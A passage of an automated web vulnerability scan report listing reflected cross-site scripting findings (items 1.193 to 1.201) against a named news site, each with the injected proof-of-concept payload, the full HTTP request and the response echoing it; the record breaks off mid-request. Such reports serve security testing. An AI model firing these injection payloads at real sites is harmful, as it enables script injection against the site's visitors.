X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:22:55 GMT
X-Varnish: 252446771
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/sites/all/modules/contrib71ac2"><script>alert(1)</script>c68568ceeea/img_assist/img_assist.js?h"/>
...[SNIP]...

1.193. http://www.itworld.com/sites/all/modules/contrib/img_assist/img_assist.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/img_assist/img_assist.js

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 137da"-alert(1)-"0d7bc91e095 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/contrib/img_assist/img_assist.js137da"-alert(1)-"0d7bc91e095?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:25:33 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460333"
Content-Type: text/html; charset=utf-8
Content-Length: 57472
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:25:36 GMT
X-Varnish: 1038160647
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
"2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites/all/modules/contrib/img_assist/img_assist.js137da"-alert(1)-"0d7bc91e095";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find the page you requested.";
s.eVar13="CMS";

...[SNIP]...

1.194. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35d85"-alert(1)-"b082d18e2ed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites35d85"-alert(1)-"b082d18e2ed/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; mobify=0; __switchTo5x=56; __unam=dad84f1-13284325649-54133fa9-1; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D14%3B%20SC_LINKS%3Dhomepage%255E%255ECyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255Ehomepage%2520%257C%2520Cyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255E%3B%20s_sq%3Didgitworldcomprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run%252526ot%25253DA%3B; s_pers=%20s_pv%3Dhomepage%7C1316479993320%3B; __utma=222989251.1353402908.1316477884.1316477884.1316477884.1; __utmb=222989251; __utmc=222989251; __utmz=222989251.1316477884.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:28:33 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460513"
Content-Type: text/html; charset=utf-8
Content-Length: 57757
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:28:35 GMT
X-Varnish: 1038166026
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
s.prop13="CMS";
s.prop14="kgerich";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites35d85"-alert(1)-"b082d18e2ed/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.
...[SNIP]...

1.195. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b30f"><script>alert(1)</script>d15c7a91e8e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites6b30f"><script>alert(1)</script>d15c7a91e8e/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; mobify=0; __switchTo5x=56; __unam=dad84f1-13284325649-54133fa9-1; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D14%3B%20SC_LINKS%3Dhomepage%255E%255ECyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255Ehomepage%2520%257C%2520Cyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255E%3B%20s_sq%3Didgitworldcomprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run%252526ot%25253DA%3B; s_pers=%20s_pv%3Dhomepage%7C1316479993320%3B; __utma=222989251.1353402908.1316477884.1316477884.1316477884.1; __utmb=222989251; __utmc=222989251; __utmz=222989251.1316477884.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:28:27 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460507"
Content-Type: text/html; charset=utf-8
Content-Length: 57976
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:28:28 GMT
X-Varnish: 1038165885
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/sites6b30f"><script>alert(1)</script>d15c7a91e8e/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js?h"/>
...[SNIP]...

1.196. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5226e"><script>alert(1)</script>b71a9bfd13c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all5226e"><script>alert(1)</script>b71a9bfd13c/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; mobify=0; __switchTo5x=56; __unam=dad84f1-13284325649-54133fa9-1; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D14%3B%20SC_LINKS%3Dhomepage%255E%255ECyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255Ehomepage%2520%257C%2520Cyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255E%3B%20s_sq%3Didgitworldcomprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run%252526ot%25253DA%3B; s_pers=%20s_pv%3Dhomepage%7C1316479993320%3B; __utma=222989251.1353402908.1316477884.1316477884.1316477884.1; __utmb=222989251; __utmc=222989251; __utmz=222989251.1316477884.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:28:42 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460522"
Content-Type: text/html; charset=utf-8
Content-Length: 57977
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:28:43 GMT
X-Varnish: 1038166244
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/sites/all5226e"><script>alert(1)</script>b71a9bfd13c/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js?h"/>
...[SNIP]...

1.197. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63fd5"-alert(1)-"aea51ddab4e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all63fd5"-alert(1)-"aea51ddab4e/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; mobify=0; __switchTo5x=56; __unam=dad84f1-13284325649-54133fa9-1; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D14%3B%20SC_LINKS%3Dhomepage%255E%255ECyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255Ehomepage%2520%257C%2520Cyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255E%3B%20s_sq%3Didgitworldcomprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run%252526ot%25253DA%3B; s_pers=%20s_pv%3Dhomepage%7C1316479993320%3B; __utma=222989251.1353402908.1316477884.1316477884.1316477884.1; __utmb=222989251; __utmc=222989251; __utmz=222989251.1316477884.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:28:48 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460528"
Content-Type: text/html; charset=utf-8
Content-Length: 57757
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:28:51 GMT
X-Varnish: 1038166657
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
op13="CMS";
s.prop14="kgerich";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites/all63fd5"-alert(1)-"aea51ddab4e/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar
...[SNIP]...

1.198. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28a28"><script>alert(1)</script>991a6e41b0a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules28a28"><script>alert(1)</script>991a6e41b0a/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; mobify=0; __switchTo5x=56; __unam=dad84f1-13284325649-54133fa9-1; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D14%3B%20SC_LINKS%3Dhomepage%255E%255ECyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255Ehomepage%2520%257C%2520Cyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255E%3B%20s_sq%3Didgitworldcomprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run%252526ot%25253DA%3B; s_pers=%20s_pv%3Dhomepage%7C1316479993320%3B; __utma=222989251.1353402908.1316477884.1316477884.1316477884.1; __utmb=222989251; __utmc=222989251; __utmz=222989251.1316477884.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:29:00 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460540"
Content-Type: text/html; charset=utf-8
Content-Length: 57976
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:29:00 GMT
X-Varnish: 1038166970
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/sites/all/modules28a28"><script>alert(1)</script>991a6e41b0a/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js?h"/>
...[SNIP]...

1.199. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e13a2"-alert(1)-"4abf7d40c4b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modulese13a2"-alert(1)-"4abf7d40c4b/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; mobify=0; __switchTo5x=56; __unam=dad84f1-13284325649-54133fa9-1; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D14%3B%20SC_LINKS%3Dhomepage%255E%255ECyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255Ehomepage%2520%257C%2520Cyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255E%3B%20s_sq%3Didgitworldcomprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run%252526ot%25253DA%3B; s_pers=%20s_pv%3Dhomepage%7C1316479993320%3B; __utma=222989251.1353402908.1316477884.1316477884.1316477884.1; __utmb=222989251; __utmc=222989251; __utmz=222989251.1316477884.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:29:08 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460548"
Content-Type: text/html; charset=utf-8
Content-Length: 57757
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:29:09 GMT
X-Varnish: 1038167129
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
S";
s.prop14="kgerich";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites/all/modulese13a2"-alert(1)-"4abf7d40c4b/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops
...[SNIP]...

1.200. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81756"><script>alert(1)</script>dda89860fe0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules/contrib81756"><script>alert(1)</script>dda89860fe0/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; mobify=0; __switchTo5x=56; __unam=dad84f1-13284325649-54133fa9-1; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D14%3B%20SC_LINKS%3Dhomepage%255E%255ECyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255Ehomepage%2520%257C%2520Cyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255E%3B%20s_sq%3Didgitworldcomprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run%252526ot%25253DA%3B; s_pers=%20s_pv%3Dhomepage%7C1316479993320%3B; __utma=222989251.1353402908.1316477884.1316477884.1316477884.1; __utmb=222989251; __utmc=222989251; __utmz=222989251.1316477884.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:29:15 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460555"
Content-Type: text/html; charset=utf-8
Content-Length: 57976
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:29:17 GMT
X-Varnish: 1038167338
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/sites/all/modules/contrib81756"><script>alert(1)</script>dda89860fe0/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js?h"/>
...[SNIP]...

1.201. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aed49"-alert(1)-"196c36e6133 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/contribaed49"-alert(1)-"196c36e6133/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
